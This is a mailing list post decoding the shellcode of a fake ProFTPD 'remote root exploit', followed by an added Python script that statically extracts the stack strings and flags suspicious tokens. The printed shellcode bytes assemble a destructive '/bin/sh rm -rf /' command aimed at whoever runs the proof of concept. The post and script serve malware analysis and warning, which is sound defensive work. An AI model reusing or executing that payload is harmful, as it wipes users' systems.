Message-ID: <20031024153453.GC10898@srv9.de.buehler.net>
From: pb+full-disclosure at mlsub.buehler.net (Philipp Buehler)
Subject: ProFTPD-1.2.9rc2 remote root exploit

On 24/10/2003, GARCIA Lionel <lionel.garcia@...bus.com> wrote To full-disclosure@...ts.netsys.com:
> --->   void(*sleep)()=(void*)sc;sleep(5);   <------- Hummm :-\

obscure the obvious :)

> The shellcode seems to be locally launched. Anybody to "decrypt" the
> shellcode ?

Well, not "fully", since this already gives enough clues:
\x31\xc0                xorl %eax,%eax
\x50                    pushl %eax
\x68\x66\x20\x2f\x58    pushl $0x66202f58 !"f /X"
\x68\x6d\x20\x2d\x72    pushl $0x6d202d72 !"m -r"
\x68\x2d\x63\x58\x72    pushl $0x2d635872 !"rcXr"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x2f\x73\x68\x43    pushl $0x2f736843 !"/shC"
\x68\x2f\x62\x69\x6e    pushl $0x2f62696e !"/bin"
\x31\xc0                xorl %eax,%eax

Then some "creative hopping" to connect this to an "/bin/sh rm -rf /"

If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :>


'LOVE' in the air ... :)

ciao
-- 
Philipp Buehler, aka fips | <double-p>

When the horse dies, get off.
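
Added example, not part of the message above or of the posted exploit: a static check a reviewer can run over an embedded shellcode array before compiling or executing a proof-of-concept, rebuilding the strings that the quoted `pushl` sequence places on the stack. The names `stack_strings`, `triage` and `SUSPICIOUS` are hypothetical, the byte string is copied from the listing in the message, and the sweep is deliberately naive (it only understands the opcodes that listing shows).

```python
"""Static triage of a shellcode blob before anyone runs the PoC that embeds it."""

# Bytes copied from the listing quoted in the message above (only what it shows).
SC = bytes.fromhex(
    "31c0" "50"
    "6866202f58" "686d202d72" "682d635872"
    "6841414141" "6841414141" "6841414141" "6841414141"
    "682f736843" "682f62696e"
    "31c0"
)

# Tokens chosen for this example; extend for your own review checklist.
SUSPICIOUS = ("/bin/sh", "rm -r", "-rf /")


def stack_strings(code: bytes) -> list[str]:
    """Rebuild strings assembled by runs of `push imm32` (opcode 0x68).

    Naive linear sweep: it knows only the opcodes in the quoted listing
    (0x68 push imm32, 0x31 two-byte xor) and steps one byte over anything
    else. x86 pushes grow the stack downward, so the last dword pushed sits
    at the lowest address and the run is read back in reverse push order.
    """
    runs, run, i = [], [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            run.append(code[i + 1:i + 5])   # immediate bytes in memory order
            i += 5
            continue
        if run:                              # any other opcode ends the run
            runs.append(run)
            run = []
        i += 2 if code[i] == 0x31 else 1
    if run:
        runs.append(run)
    return [b"".join(reversed(r)).decode("latin-1") for r in runs]


def triage(code: bytes) -> list[tuple[str, list[str]]]:
    """Pair each rebuilt string with the suspicious tokens it contains."""
    return [(s, [t for t in SUSPICIOUS if t in s]) for s in stack_strings(code)]


if __name__ == "__main__":
    for text, hits in triage(SC):
        print(repr(text), "->", hits or "no hits")
```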

